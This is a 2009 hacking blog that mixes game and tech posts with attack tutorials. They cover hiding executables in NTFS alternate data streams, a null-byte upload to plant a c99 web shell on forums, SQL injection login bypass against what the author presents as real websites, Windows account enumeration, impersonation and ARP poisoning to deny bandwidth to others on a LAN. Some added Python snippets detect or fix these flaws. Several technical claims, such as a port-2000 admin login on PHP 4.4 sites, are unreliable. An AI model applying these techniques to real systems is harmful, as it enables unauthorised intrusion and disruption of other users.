    At the destination the headers are peeled back to reveal the original data. Having understood the TCP stack, let us look at IPv4. The original IPv4 standard left three basic security issues unaddressed: authentication, integrity and privacy. Authentication was an issue because an attacker could easily spoof an IP address and exploit a session. Spoofing was not restricted to IP addresses alone but also extended to MAC addresses, as in ARP spoofing. An attacker sniffing a network could capture packets and carry out simple attacks such as changing, deleting, rerouting, adding, forging or diverting data. Perhaps the most popular of these is the man-in-the-middle attack, in which an attacker grabs unencrypted traffic from a victim's network-based TCP application and tampers with the authenticity and integrity of the data before forwarding it on to the unsuspecting target.



    ---Regards,
    Amarjit Singh

    Create 3d Screensavers with Easy 3D Creator

    When it comes to screensavers, I practically hate them, and even more so if they are shareware. I hate screensavers that have a petty watermark on them and ask me, with a nag screen, to purchase the full version. But there were times when I wanted to create my own screensavers, and I did that with Easy 3D Creator. Easy 3D Creator is freeware (which is the best part of it, apart from the stunning capabilities it provides): you can create stunning 3D screensavers in a few minutes with no programming. All you need is a bit of creativity; you set some parameters that determine your screensaver's appearance and behavior in step-by-step mode, seeing the result immediately.

    What does Easy 3D Creator do?

    (Shamelessly ripped from official website :P)

    1. Create stunning 3D screensavers in a few minutes with no programming!
    2. Wrap the screen saver into installer and generate End-User License Agreement for you automatically!
    3. You can use a built-in wizard to create a screen saver with your logo or photos with a few mouse clicks!
    4. Can generate time-limited shareware screen savers!

    What can I do with Easy 3D Creator?

    1. Dramatically increase your site's traffic by publishing free 3D screen savers! (which I will not do :P).
    2. Amaze your friends with your own artistic 3D screen savers (you can use your photos as textures)!
    3. Promote your trade mark!
    4. Enjoy creating animated 3D art!
    5. Get unlimited number of different screen savers for your desktop for free!
    6. Sell shareware screen savers and make some money!
    7. ..
    8. ..
    9. ..
    10. And as a hacker, I will create a good screensaver, bind it with some good binders, encrypt it in a jpeg file and send it to all my friends (seems n00bish, but then I can't stop thinking about that :)

    You can download it from here -

    Download Easy3D creator

    PS: It WON'T work on Vista :) Sorry, Vista dudes.

    POSTED BY XERO ALL RIGHTS RESERVED.

    Thursday, July 23, 2009

    5 Hacking Sites for a budding Hacker

    Well well well.. As I already told you, most people ask me how to become a hacker, and my usual reply is that I can't make you a hacker, but I can tell you how to be one, and it is your interest, your passion and your mindset which will drive you to be one. A hacker evolves through many stages, from the lower-level script kiddie to the elite-level guru, and one needs to be in constant research to develop one's soft and hard skills. I am myself learning a lot, and I would like to share 5 hacking sites which you must visit if you want to be an expert in security.

    Phrack

    Phrack is the granddaddy of all the hacking sites out there and is the world's oldest hacker ezine, by hackers, for hackers. Described by Fyodor (Gordon Lyon) as "the best, and by far the longest running hacker zine", it covers deep articles on hacking and cracking. A heaven for willing learners; its articles are worth their weight in gold.

    Hakin9

    Hakin9 offers an in-depth look at both attack and defense techniques and concentrates on difficult technical issues. Hakin9's target readers are those responsible for IT system security, programmers, security specialists, professional administrators, as well as people taking up security issues in their free time.

    Milw0rm

    When it comes to getting exploits, few sites are as comprehensive and up to date as Milw0rm. Milw0rm provides a one-stop platform for security experts around the world to publish their newly found exploits on the web so that others can study them, for better or worse.

    Hack this Site

    Wanna test your hacking skills? Hack This Site puts your skills to the ultimate test as it throws real-life challenges of almost every type at you. Trust me, if you have it in you, visit it and complete its missions, and nothing can beat you.

    2600

    A great collection of articles and podcasts on security; one has to visit 2600 to get a feel for what hacking is.

    I believe you will get better and learn something..

    Keep Learning

    POSTED BY XERO ALL RIGHTS RESERVED.

    Tuesday, July 21, 2009

    Hide files using Alternate Data Streams

    Windows has its share of weaknesses which can be manipulated by a creative hacker. Microsoft incorporated the NTFS file system, which allowed for greater data compression and better file storage algorithms, but a relatively little-known compatibility feature of NTFS, Alternate Data Streams (ADS), provides hackers with a method of hiding rootkits or hacker tools on a breached system and allows them to be executed without being detected by the computer user.

    However dangerous it sounds, it is amazingly easy to create an ADS, and it requires little or no skill on the part of the hacker. ADS works by storing two data streams under a single file name, and simple DOS commands like "type" are used to create an ADS. These commands are used in conjunction with a redirect [>] and a colon [:] to fork one file into another.

    For instance:  the command

    type c:\anyfile.exe > c:\winnt\system32\cmd.exe:anyfile.exe

    will fork the common Windows command program with an ADS "anyfile.exe".

    One can hide files using this method, and they are almost impossible to detect.

    POSTED BY XERO. ALL RIGHTS RESERVED.
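An added example, not from the post above, of how a defender finds such streams: on Windows Vista and later, dir /r lists every stream of every file as name:stream:$DATA, and this Python script parses that listing and flags streams that look executable, skipping the well-known Zone.Identifier stream that browsers attach to downloads. The listing embedded below is constructed to mirror the cmd.exe:anyfile.exe example.

```python
"""Added example: find alternate data streams in `dir /r` output.
SAMPLE_DIR_R is a constructed listing, not captured from a real system."""
import re
import sys

# Constructed sample of `dir /r c:\winnt\system32`: stream lines carry only a
# size and the name:stream:$DATA triple, indented under the host file.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\winnt\\system32

07/21/2009  10:15 AM    <DIR>          .
07/21/2009  10:15 AM    <DIR>          ..
07/21/2009  10:15 AM           236,544 cmd.exe
                                73,802 cmd.exe:anyfile.exe:$DATA
07/21/2009  10:15 AM            12,288 notepad.exe
                                    26 notepad.exe:Zone.Identifier:$DATA
               2 File(s)        248,832 bytes
"""

# size, host file name, stream name; only lines ending in :$DATA are streams
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Zone.Identifier is the mark-of-the-web stream Windows adds to downloaded files.
BENIGN_STREAMS = {"Zone.Identifier"}
SUSPICIOUS_EXT = (".exe", ".dll", ".com", ".scr", ".bat", ".cmd", ".vbs", ".ps1")


def parse_streams(listing: str) -> list:
    """Return (host_file, stream_name, size_in_bytes) for each ADS line."""
    found = []
    for line in listing.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            found.append((m.group(2), m.group(3), int(m.group(1).replace(",", ""))))
    return found


def suspicious_streams(listing: str) -> list:
    """Drop known-benign streams and say why each remaining one is flagged."""
    hits = []
    for host, stream, size in parse_streams(listing):
        if stream in BENIGN_STREAMS:
            continue
        reason = ("executable extension" if stream.lower().endswith(SUSPICIOUS_EXT)
                  else "unexpected stream")
        hits.append({"file": host, "stream": stream, "size": size, "reason": reason})
    return hits


if __name__ == "__main__":
    # Usage on Windows:  dir /r /s C:\ | python ads_scan.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DIR_R
    for hit in suspicious_streams(text):
        print("{file}:{stream} ({size} bytes) - {reason}".format(**hit))
```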

    Sunday, July 19, 2009

    The Null Byte Hack

    Many web forums have mushroomed on the internet, and they are set up in a jiffy, so they don't pay much attention to security. An older exploit I am discussing here is the Null Byte exploit. Almost all forums include a picture and avatar uploading system where you can upload your user signatures and avatars. At first look it looks like a normal uploading system, but it is a way to upload our own files onto the forum, or to get into the admin area and literally "OWN" the forum. However, as this hack is outdated by now, most have deployed some form of input sanitation to prevent such an attack. Nevertheless, thousands of vulnerable forums still exist, even some bigger names among them.

    How to exploit it?

    In order to exploit this vulnerability, you must input "%00" (with or without a space, as the case arises). Now a lot of you are probably asking what the heck that is. Ah well.. it is the URL-encoded form of a NULL byte. It is much the same as what we used to exploit the null session in Windows systems.

    Now, whenever you upload a file, you will be asked to specify the directory where the file is located. Each file has a particular extension to signify the kind of file it is. Now what if we can put the "%00" into the file name?

    The way most forums keep bad files under control and out of the forum is by restricting certain extensions such as .exe, .php etc. But if we can modify the file name and trick the server into thinking that it is something else, the..

    For Example:

    C:\webroot\c99.php% 00.jpg

    Now when we do this, the operating system will read the file to be uploaded as a PHP file, but the forum server will read it as a .jpg (image) file. And when this happens, you can exploit it to upload your files onto the server and, if you are a bit creative, access the admin area too.

    Cheers and Keep Learning

    POSTED BY XERO ALL RIGHTS RESERVED.
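The bug described above, as an added example (not code from the original post or from any forum software): a forum-style check that tests the extension of the whole decoded string and then hands the name to a NUL-terminated C API accepts c99.php%00.jpg as a .jpg while the file system stores c99.php. The hardened version rejects control characters, validates only the base name and never reuses the client's name. The file names are constructed; os_truncate simulates the C-string behaviour (PHP before 5.3.4 passed such names through to the file system this way).

```python
"""Added example: extension checks with and without the null-byte flaw.
Inputs are constructed; os_truncate stands in for a NUL-terminated C API."""
import os
import secrets
from urllib.parse import unquote

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def os_truncate(name: str) -> str:
    """What a NUL-terminated C string API sees: everything after \\x00 is gone."""
    return name.split("\x00", 1)[0]


def vulnerable_upload_name(submitted: str):
    """Forum-style check: decode, test the extension on the *whole* string,
    then hand that string to the file system. Returns the name the file is
    actually stored under, or None if rejected."""
    decoded = unquote(submitted)                      # "%00" -> "\x00"
    if not decoded.lower().endswith(tuple(ALLOWED_EXT)):
        return None                                   # "c99.php" is rejected here ...
    return os_truncate(decoded)                       # ... but "c99.php\x00.jpg" lands as "c99.php"


def hardened_upload_name(submitted: str):
    """Reject control bytes and path components, validate the extension of the
    base name only, and store under a server-generated name."""
    decoded = unquote(submitted)
    if any(ord(c) < 32 for c in decoded):             # \x00 and other control characters
        return None
    base = os.path.basename(decoded.replace("\\", "/"))  # strip C:\webroot\ style prefixes
    ext = os.path.splitext(base)[1].lower()
    if not base or base.startswith(".") or ext not in ALLOWED_EXT:
        return None
    # The client's name is never reused; only the validated extension survives.
    # (A complete check would also verify the file content's magic bytes.)
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    for name in ("avatar.jpg", "c99.php", "c99.php%00.jpg", "C:\\webroot\\c99.php%00.jpg"):
        print(repr(name), "vulnerable ->", vulnerable_upload_name(name),
              "| hardened ->", hardened_upload_name(name))
```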

    Saturday, July 18, 2009

    Google Chrome OS FAQ

    Google has made quite an impact by announcing Chrome OS, and it is indeed sending waves through the tech world, with some saying the OS signals the beginning of the end for the reign of Microsoft and others saying that Google will fall flat on its face and fail. Without more specifics, only time will tell how big of a splash the OS will really make. Google pledges to release more information regarding the OS later this summer.

    This leaves us with lots of questions and few answers. Until Google decides to share more, we'll try to make the best of what we've got in this FAQ.

    What is Chrome OS?

    Chrome OS is a Linux-based operating system developed by Google which promises to focus on Web applications while integrating a fast and simple interface, based off Google's existing Chrome browser.

    Who will use it?

    Chrome OS is initially targeted at the netbook market, but Google plans to offer the OS for computers all the way up to full-size desktops. Chrome supports both x86 and ARM architectures, which means that most computers and possibly some mobile devices will be able to run Chrome OS.

    What will it look like?

    As Google says Chrome OS will run a heavily modified version of Chrome browser so it may resemble chrome with a dock full of apps.

    What will become of my computer's desktop?

    Nothing.. period. When it releases, dual boot it :P The Linux kernel is flexible, so anything's possible.

    How will my computer stay secure?

    Google claims that it will design Chrome OS's security infrastructure so users "don't have to deal with viruses, malware and security updates." It may or may not be possible, since the protection measures are built into Chrome OS itself. But still, flaws are always there.

    No computer is truly virus-proof. What will happen if mine gets one?

    Good question. It is a common perception that Linux doesn't get viruses, but that is only because it is a low-profile OS and is not targeted as much as Windows; Chrome will make it an attractive target for virus makers. It's not known what security measures will be in place to save a compromised computer. Probably Linux-based anti-viruses will surface from AV giants like Norton and Kaspersky, exclusive to Chrome.

    Should I be worried about privacy when entrusting my OS to Google?

    This issue has already raised eyebrows by some privacy advocates. Earlier, the company took heat for the way it collected data from Chrome users, and had to make concessions. Until Google can explain how an entire operating system won't be any more intrusive than its existing data-collection practices on the Web, privacy is a valid concern.

    Will Chrome OS computers resemble Macs or Windows-based PCs at all?

    As Google truly intends for Chrome OS to be a Web-centric OS and their official statement states that Google is "working with multiple OEMs to bring a number of netbooks to market next year." We could see a new line of computers built exclusively for Chrome OS.

    Will we see applications exclusive to Chrome OS?

    Nah.. as the operating system stresses Web apps above all (think of it like add-ons for Mozilla Firefox). Furthermore, Google itself says Web apps "will run not only on Google Chrome OS, but on any standards-based browser on Windows, Mac and Linux thereby giving developers the largest user base of any platform."

    Will we see applications that won't run on Chrome OS?

    Without a doubt. If Chrome OS could perform every task, it'd be another Windows or OS X, and that's not what Google is trying to do. Don't expect to run Crysis, or Minesweeper.

    Will "Favorite Application X" run on Chrome OS?

    It depends upon the software developer, whether it supports the OS, or upon whether Google is interested in the program. It's conceivable (to date) that Microsoft won't support a Chrome OS-compatible Office suite, but Google could get things going by building out its Docs suite to match.

    When will Chrome OS be released?

    It will become available later this year, first for outside programmers to begin tinkering. It'll reach the netbook market in the second half of 2010, according to sources quoted in The New York Times.

    I'm keeping my fingers crossed.. period.

    POSTED BY XERO. ALL RIGHTS RESERVED.

    Friday, July 17, 2009

    RE4 Goes Mobile

    Yep.. My favorite survival horror game of all time (which might be your favorite too..), Resident Evil 4, has been confirmed for the Apple iPhone. With 1.5 billion apps sold through the App Store, the Apple iPhone is becoming a new platform for gaming, and traditional game developers are beginning to see its potential in a big untapped market. Porting titles like RE4 and MGS4 to the iPhone proves it. Resident Evil 4 is one of the most successful and intricately detailed games of all time, which pushed a struggling franchise to the pinnacle of its genre. We might be seeing Resident Evil 5 on our mobiles in future. Capcom (the makers of the RE series) announced today through their Twitter feed that Resident Evil 4 is coming to the iPhone at the end of July in Japan, to be followed "shortly thereafter" in the rest of the world.

    Resident Evil 4 Mobile

    Looks good.. period

    According to Joystiq, RE4 for the iPhone was apparently put up on the App Store by mistake (?!!) on Monday, then quickly pulled, but not before the Japanese iPhone site AppBank was able to get their hands on it. From there it spread like wildfire, and now I'm desperately waiting for it to come. No.. I don't have an iPhone, but I would like to see how it stacks up against its console counterparts.

    For the time being, you can judge the game by looking at the video below -

    Keep gaming

    POSTED BY XERO. ALL RIGHTS RESERVED. Source

    Wednesday, July 15, 2009

    Little Fighter 2 Rockz

    Little Fighter 2 has been quite popular in gaming circles, with gamers battling each other online to match their skills with the best. Little Fighter 2 successfully combines the fast gameplay of a fighting game with intuitive controls and has made its place in our hearts over the last 10 years. It is a chibi-styled fighting game with a retro anime feel, and you fight against the computer or a friend, head to head or in a melee.

    The controls are simple and customizable to your liking. You can move up, down, left and right; you can attack, defend and jump. That's it. No more, no less, and yet some users claim that Little Fighter can suck them in for hours at a time. LF2 is an easy-to-pick-up but hard-to-master game, and with its almost flat learning curve it creates great competitive battles. You can invite 4 of your friends to have a brawl on the same keyboard.. that's the beauty of this game. There are 10 characters in total, but with the code lf2.net entered on the character select screen the total becomes 23 fighters. There are 9 backgrounds and 10 weapons (if you count the beer and the milk as weapons :P).

    Celebrating the 10th anniversary of LF2, it was updated to version 2.0, which improved the gameplay and added a recording mode and a survival mode. There is a dedicated fanbase for LF2, and every now and then a new mod pops up which says "play me !!" and is almost as addictive as the original game. My favorite mod is LF2 1.5, or LF2 Reinforced, which gives DBZ-styled powers to the characters and makes for an insane brawling experience. And the best part of this is that LF2 is freeware !!! Talk about cream of the top..

    My Recco – Get it, play it with your best friend or your worst enemy, it's worth its salt.

    Download Little Fighter 2

    Download Little Fighter 2 Reinforced Mod

    Keep Brawling

    POSTED BY XERO. ALL RIGHTS RESERVED.

    Monday, July 13, 2009

    Hacking PHP 4.4 sites in 20 seconds

    Now here is a real hacking tutorial in which I am going to hack a real website, and that too in less than 20 seconds, and I am not kidding. Actually, sites with PHP 4.4 have a SQL injection vulnerability in them which makes their admin control panel easily accessible, and I mean in one big shot you will be admin of that site.

    Remember, this tutorial is applicable to PHP 4.4 machines with Apache running alongside them. Also, since I will be hacking REAL websites, I will not be displaying their URLs, or else I will be gunned down (by the law, of course :P). It will be partial in nature, that is, I will NOT be teaching each and everything to you; I assume you know the basics of SQL injection/PHP injection/Google searching, and if you don't, then read these articles first -

    Google Search Tips for Hacking

    Google Secrets – Some Cool Google Dorks

    Basics of SQL Injection

    SQL injection by example

    Simple Nmap Scanning

    In the meantime, here is how you can start -

    Step 1 – Search for them

    Yep, make a Google dork to find sites running Apache and PHP 4.4. It is quite easy.

    Step 2 – Scan them

    Start by scanning them using Nmap: do an intense scan and find the open ports. If you find port 2000 open, then you have almost got it. Most websites running PHP 4.4 have this port for admin login.

    Now just log in using port 2000, i.e. -

    http://www.website.com:2000

    and you will comfortably log in to the admin page like this -

    You will log in with port 2000 into the website

    Step 3 – Hack them

    Now in the fields,you have to type -

    username – admin

    password – a’ or 1=1 or ‘b

    domain - a’ or 1=1 or ‘b

    Inject the fields with these values

    and press Go; you will be logged in as admin

    and you have hacked into admin

    Voila.. you have hacked into admin. Actually, sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection. It will literally take 20 seconds.
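The login bypass above, reproduced as an added example against an in-memory SQLite table (not code from the original post or from any real site): a constructed user row, the query built by string concatenation that the payload a' or 1=1 or 'b turns into an always-true condition, and the parameterised query that treats the same input as plain data and lets only the real credentials through.

```python
"""Added example: the page's payload against a concatenated query and a
parameterised one. Table contents and credentials are constructed."""
import sqlite3

PAYLOAD = "a' or 1=1 or 'b"   # the value the post types into the password and domain fields


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, domain TEXT)")
    # Cleartext password only to keep the example short; a real system stores a hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret', 'example.test')")
    return conn


def build_vulnerable_query(username: str, password: str, domain: str) -> str:
    """String concatenation: the user's quotes become part of the SQL grammar."""
    return ("SELECT username FROM users WHERE username='%s' "
            "AND password='%s' AND domain='%s'" % (username, password, domain))


def login_vulnerable(conn, username: str, password: str, domain: str):
    # With PAYLOAD the WHERE clause reads
    #   ... AND password='a' or 1=1 or 'b' AND domain='a' or 1=1 or 'b'
    # and "or 1=1" makes it true for every row, so the first user comes back.
    row = conn.execute(build_vulnerable_query(username, password, domain)).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str, domain: str):
    """Parameterised query: the driver passes the values separately from the
    statement, so a quote inside them can never close the string literal."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=? AND domain=?",
        (username, password, domain),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("admin", PAYLOAD, PAYLOAD))
    print("vulnerable:", login_vulnerable(db, "admin", PAYLOAD, PAYLOAD))   # admin
    print("safe:      ", login_safe(db, "admin", PAYLOAD, PAYLOAD))         # None
```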

    I hope that was informative :P Go learn something.

    Cheers

    POSTED BY XERO. ALL RIGHTS RESERVED.

    Friday, July 10, 2009

    Recover Email Password using SMS

    First of all.. I would like to say that Gmail is out of beta.. yep.. After a long time in which they integrated the best of the world into their email system, it was the right time to rip off the tag, and they did it. Further, with the world going mobile, they took some steps to enhance security a notch above other email services. It helps to know that even the best of us forget our passwords from time to time; in fact, a sheer mass of people visit the Gmail help center every day just to recover their passwords. To help with these situations, Google went a step ahead by adding the ability to recover your password via text message.

    Gmail password SMS recovery

    In order to access this feature, sign in to your account, select 'Change Password Recovery Options', enter your cell phone number and click 'Save'.
    The next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.
    In general, it's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and a security question. And don't forget to keep them up to date.
    After all, we all make mistakes :P

    Cheers and Keep Learning

    POSTED BY XERO. ALL RIGHTS RESERVED. Source – Official Gmail Blog – Page 1, Page 2.

    Enumerate User Information

    Enumerate User Information from Target: USERDUMP

    The USERDUMP application is designed to gather user information from the target. Some of the information enumerated is the user RID, privileges, login times, login dates, account expiration date, network storage limitations, login hours, and much more.

    From a DOS prompt, type the following syntax:

    userdump \\Target IP Address Target Username

    The results reveal the following details for the username Administrator:
    The User ID is 500. (This tells us that this is indeed the real Administrator account.)
    The user's password never expires.
    The Administrator last logged in at 12:44 a.m. on January 16, 2004.
    The account has had 9 bad password attempts.
    The Administrator has only logged in to this computer 2 times.
    The PasswordExp is set to 0. (This tells us that the password never expires.)
    The logon hours are all set to 1. (This tells us that the Administrator can log in 24/7.)
    Other information.

    The username Administrator details have been successfully enumerated via the USERDUMP application.



    Exploit Data from Target Computer: USERINFO

    The USERINFO application is designed to gather user information from the target. Some of the information enumerated is the user RID, privileges, login times, login dates, account expiration date, network storage limitations, login hours, and much more. An attacker uses this information in his or her social engineering phase of an attack.

    From a Disk Operating System (DOS) prompt, type the following syntax:

    userinfo \\Target IP Address Target Username

    Notice that the results returned by USERINFO are identical to those of the USERDUMP application.





    ---Regards,
    Amarjit Singh

    Thursday, July 9, 2009

    Social Engineering Techniques: Dumpster Diving

    Information that companies consider sensitive is thrown out daily in the normal garbage cans. Attackers can successfully retrieve this data by literally climbing into the company dumpsters and pilfering through the garbage. Information such as names, Social Security numbers, addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere. I personally know a nationally recognized movie rental company that still uses carbon paper in its fax machine. Once the roll is used up they simply throw the entire roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay for their movies, and so forth.

    Another social engineering attack that also proves to be very successful is when an attacker dresses in the uniform of those personnel considered "honest" and "important" or even "expensive." For example, an attacker purchases/steals the uniform of a carrier, telephone, or gas or electric employee and appears carrying boxes and/or clipboards, pens, tools, etc. and perhaps even an "official-looking" identification badge or a dolly carrying "equipment." These attackers generally have unchallenged access throughout the building as employees tend to see "through" these types of people. When is the last time you challenged one of these personnel to verify their credentials?

    This attack is very risky as the attacker can now be personally identified should he or she get caught. Again, this attack is normally very successful so bear this in mind.

    ---Regards,
    Amarjit Singh

    Wednesday, July 8, 2009

    Getting Max Internet Speed using ARP Poisoning

    Ever thought of stealing internet bandwidth on a local LAN? Well.. I usually do it when I am surfing the net at night and need more speed for downloading games, and I do it using Ettercap.. and you can do that too. Well, it is done using ARP poisoning.. sounds geeky, but it is the technical name of network sniffing. Basically, sniffing is used to get passwords, encrypted or unencrypted, on a network. But it can also be used to choke the network bandwidth and get maximum bandwidth on a single system. For those who don't know how it happens, lemme give you a little insight into how it happens.

    Below is an example of a normal network. As we can see, we are working on a laptop and we have to sniff out a target computer. All the systems get data via a switch which is itself connected to a router. The router has a MAC address which in this case is not bound to a particular IP. All the data is routed to the switch, which serves the systems.

    Normal Network

    The systems connect to the router through the MAC address of the router. Technically, we have to spoof the MAC address of the router so that all the data is sent through our system (the laptop in this case) and we are able to see and analyze each packet of data. In simple words, this process of spoofing is known as ARP poisoning. Also, in normal conditions, data sent through a LAN is unencrypted in nature.

    Poisoned Network

    As we can see in the above diagram, we have now spoofed the MAC address, and the data is sent through our system, so we can view passwords and data.

    But hey, wait.. I said that I would tell you how to get maximum speeds, didn't I? Well.. it's easy. When you poison a network and spoof the address, but have not yet started sniffing, then all the systems will send their data to your system and will not be able to access the net. And you will be playing with full bandwidth !!!

    To do this, download Ettercap and poison the network (Shift+U, then Ctrl+S.. do some homework and get the idea) but DON'T START SNIFFING. Once you have poisoned it, you will be able to surf the internet at maximum bandwidth whereas others won't. I used to do it on my net connection at night so nobody was able to complain, and I stopped it as soon as my downloads finished, so I was well away from the hands of the law. BTW, Ettercap is one of the best available tools for sniffing any network out there. I love it..

    Download ETTERCAP

    PS: If you wanna check whether your network is being sniffed or not, go to -

    Start Menu –> Run –> type CMD and press Enter.

    Then type, without quotes, "arp -a".

    If your network is being sniffed, then the MAC addresses listed will be the same: the router's entry shows the same MAC address as another host.
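The arp -a check above, as an added Python example that is not part of the original post: it parses the table and reports any MAC address claimed by more than one IP, in particular when one of them is the gateway. SAMPLE_ARP_A is a constructed Windows listing, and the same parser accepts the Linux/macOS line format.

```python
"""Added example: spot duplicate MAC addresses in `arp -a` output.
SAMPLE_ARP_A is constructed; the router and 192.168.1.20 share one MAC."""
import re
import sys
from collections import defaultdict

SAMPLE_ARP_A = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.20          00-11-22-33-44-55     dynamic
  192.168.1.30          00-aa-bb-cc-dd-ee     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# An IPv4 address followed later on the line by a MAC in 00-11-.. or 00:11:.. form.
# Matches both Windows rows and Linux "? (192.168.1.1) at 00:11:22:33:44:55 ..." rows.
ARP_LINE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3}).*?([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})")


def parse_arp_table(text: str) -> dict:
    """Map IP -> normalised MAC, skipping broadcast and multicast entries."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if not m:
            continue
        ip, mac = m.group(1), m.group(2).lower().replace("-", ":")
        if int(mac[:2], 16) & 1:   # group bit set: broadcast/multicast, never a host
            continue
        table[ip] = mac
    return table


def duplicate_macs(table: dict) -> dict:
    """MACs that appear for more than one IP, with the IPs that claim them."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_is_duplicated(table: dict, gateway_ip: str) -> bool:
    """True when another host answers for the gateway's MAC, the classic sign
    of an ARP-poisoned gateway entry."""
    return table.get(gateway_ip) in duplicate_macs(table)


if __name__ == "__main__":
    # Usage:  arp -a | python arp_check.py 192.168.1.1
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ARP_A
    table = parse_arp_table(text)
    for mac, ips in duplicate_macs(table).items():
        print("MAC %s is claimed by %s" % (mac, ", ".join(ips)))
    if len(sys.argv) > 1:
        print("gateway duplicated:", gateway_is_duplicated(table, sys.argv[1]))
```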

     

    I hope it was informative.

    Keep Learning

    POSTED BY XERO. ALL RIGHTS RESERVED.